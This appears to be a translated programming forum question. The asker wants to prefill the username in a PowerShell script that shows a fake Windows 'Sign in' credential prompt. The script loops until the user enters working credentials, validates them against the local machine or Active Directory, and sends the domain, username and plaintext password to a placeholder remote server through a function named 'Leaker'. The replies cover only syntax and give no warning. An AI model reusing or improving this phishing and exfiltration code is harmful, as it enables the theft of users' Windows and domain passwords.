Как предварительно заполнить поле имени пользователя именем пользователя?

#windows #powershell #credentials

#Windows #powershell #учетные данные

Вопрос:

Я хочу, чтобы поле имени пользователя предварительно заполнялось после заполнения поля creds в powershell.

https://learn.microsoft.com/en-us/uwp/api/windows.security.credentials.ui.credentialpickeroptions .предыдущая учетная запись#Windows_Security_Credentials_UI_CredentialPickerOptions_PreviousCredential

Это может сработать, но Ibuffer говорит, что определяет, заполнены ли поля диалогового окна предыдущими учетными данными. Значение по умолчанию — не предварительно заполнять поля.

 Add-Type -AssemblyName System.Runtime.WindowsRuntime
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$asTaskGeneric = ([System.WindowsRuntimeSystemExtensions].GetMethods() | ? { $_.Name -eq 'AsTask' -and $_.GetParameters().Count -eq 1 -and $_.GetParameters()[0].ParameterType.Name -eq 'IAsyncOperation`1' })[0]
[Windows.Security.Credentials.UI.CredentialPicker,Windows.Security.Credentials.UI,ContentType=WindowsRuntime]
[Windows.Security.Credentials.UI.CredentialPickerResults,Windows.Security.Credentials.UI,ContentType=WindowsRuntime]
[Windows.Security.Credentials.UI.AuthenticationProtocol,Windows.Security.Credentials.UI,ContentType=WindowsRuntime]
[Windows.Security.Credentials.UI.CredentialPickerOptions,Windows.Security.Credentials.UI,ContentType=WindowsRuntime]
#[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

$CurrentDomain_Name = $env:USERDOMAIN
$ComputerName = $env:COMPUTERNAME

# For our While loop
$status = $true


# There are 6 different authentication protocols supported. Can be seen here: https://learn.microsoft.com/en-us/uwp/api/windows.security.credentials.ui.authenticationprotocol
$options = [Windows.Security.Credentials.UI.CredentialPickerOptions]::new()
$options.AuthenticationProtocol = 0
$options.Caption = "Sign in"
$options.Message = "Enter your credentials"
$options.TargetName = "1"


# CredentialPicker is using Async so we will need to use Await
function Await($WinRtTask, $ResultType) {
    $asTask = $asTaskGeneric.MakeGenericMethod($ResultType)
    $netTask = $asTask.Invoke($null, @($WinRtTask))
    $netTask.Wait(-1) | Out-Null
    $netTask.Result
}

function Leaker($domain,$username,$password){
    try{
        Invoke-WebRequest http://Server_IP:PORT/$domain";"$username";"$password -Method GET -ErrorAction Ignore
        }
    catch{}
    }

function Credentials(){
    while ($status){

        # Where the magic happens
        $creds = Await ([Windows.Security.Credentials.UI.CredentialPicker]::PickAsync($options)) ([Windows.Security.Credentials.UI.CredentialPickerResults])
        if (!$creds.CredentialPassword -or $creds.CredentialPassword -eq $null){
            Credentials
        }
        if (!$creds.CredentialUserName){
            Credentials
        }
        else {
            $Username = $creds.CredentialUserName;
            $Password = $creds.CredentialPassword;
            if ((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain -eq $false -and ((Get-WmiObject -Class Win32_ComputerSystem).Workgroup -eq "WORKGROUP") -or (Get-WmiObject -Class Win32_ComputerSystem).Workgroup -ne $null){
                $domain = "WORKGROUP"
                $workgroup_creds = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('machine',$ComputerName)
                if ($workgroup_creds.ValidateCredentials($UserName, $Password) -eq $true){
                    Leaker($domain,$Username,$Password)
                    $status = $false
                    exit
                    }
                else {
                    Credentials
                    }                
                }

            $CurrentDomain = "LDAP://"   ([ADSI]"").distinguishedName
            $domain = New-Object System.DirectoryServices.DirectoryEntry($CurrentDomain,$username,$password)
            if ($domain.name -eq $null){
                Credentials
            }
            else {
                leaker($CurrentDomain_Name,$username,$password)
                $status = $false
                exit
            }
        }
    }
}


Credentials
  

Фактический результат показан на следующем изображении
! (https://imgur.com/gEYCzyr )

Ожидаемый результат должен быть !(https://imgur.com/epk1VvJ )

Комментарии:

1. В качестве отступления: в PowerShell функции вызываются как команды оболочки foo arg1 arg2 , а не как методы C # foo(arg1, arg2) ; см. Get-Help about_Parsing . Если вы используете , для разделения аргументов, вы создадите массив , который функция видит как один аргумент. Чтобы предотвратить случайное использование синтаксиса метода, используйте Set-StrictMode -Version 2 или выше, но обратите внимание на другие его эффекты.

2. То же самое относится и к New-Object вызовам: вместо New-Object SomeType(arg1, ...) , используйте New-Object SomeType [-ArgumentList] arg1, ...

3. Это кажется ужасно большой работой по сравнению с простым использованием Get-Credential . Также не отображаются параметры CredentialPickerOptions или какая-либо перегрузка CredentialPicker. PickAsync поддерживает предварительное заполнение поля учетных данных.